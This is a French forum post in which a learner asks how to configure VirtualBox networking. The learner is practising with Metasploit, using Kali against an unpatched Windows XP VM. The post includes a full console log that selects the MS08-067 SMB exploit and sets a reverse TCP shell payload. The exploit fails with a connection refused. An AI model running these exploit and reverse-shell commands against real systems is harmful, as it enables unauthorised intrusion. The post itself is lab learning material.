En m'entrainant avec Metasploit avec 2 machine virtuelle , une qui attaque "Kali Linux avec Metasploit , et la cible " un windows xp" sans antivirus n'y mise à jour .
Je lance Metasploit , j'utilise un payload du moins j'essaye de bien comprendre ,en me servant de RHOST pour mettre L'adresse IP de Windows XP, tout va pour le mieux mais des que je lance l'exploit ....
Le terminal me dit que l'exploit a échoué , la connexion a était refusé par l'hôte distant (10.0.2.15:445).
Mes 2 machine virtuelle Kali et windows xp , son réglé sur connexion Nat dans configuration réseau .Et c'est là ou je galère justement, avec le réseau .
l'adresse IP de mon xp est : 10.0.2.15
en faites je ne sais pas comment configuré correctement le réseau sur virtualbox que ce soit pour Kali linux ou windows xp pour m'entrainer avec metasploit . Merci d'avance
PS :
Voilà le rapport entier de Metasploit :
Je lance Metasploit , j'utilise un payload du moins j'essaye de bien comprendre ,en me servant de RHOST pour mettre L'adresse IP de Windows XP, tout va pour le mieux mais des que je lance l'exploit ....
Le terminal me dit que l'exploit a échoué , la connexion a était refusé par l'hôte distant (10.0.2.15:445).
Mes 2 machine virtuelle Kali et windows xp , son réglé sur connexion Nat dans configuration réseau .Et c'est là ou je galère justement, avec le réseau .
l'adresse IP de mon xp est : 10.0.2.15
en faites je ne sais pas comment configuré correctement le réseau sur virtualbox que ce soit pour Kali linux ou windows xp pour m'entrainer avec metasploit . Merci d'avance
PS :
Voilà le rapport entier de Metasploit :
Code:
msf > use exploit/windows/smb/ use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/ms06_040_netapi use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms09_050_smb2_negotiate_func_index use exploit/windows/smb/ms10_061_spoolss use exploit/windows/smb/netidentity_xtierrpcpipe use exploit/windows/smb/psexec use exploit/windows/smb/psexec_psh use exploit/windows/smb/smb_relay use exploit/windows/smb/timbuktu_plughntcommand_bof msf > use exploit/windows/smb/067_netapi [-] Failed to load module: exploit/windows/smb/067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 10.0.2.15 RHOST => 10.0.2.15 msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.0.2.15 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set LHOST 10.0.2.15 LHOST => 10.0.2.15 msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.0.2.15 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LHOST 10.0.2.15 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 10.0.2.15:4444 [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.0.2.15:445). msf exploit(ms08_067_netapi) >
Commentaire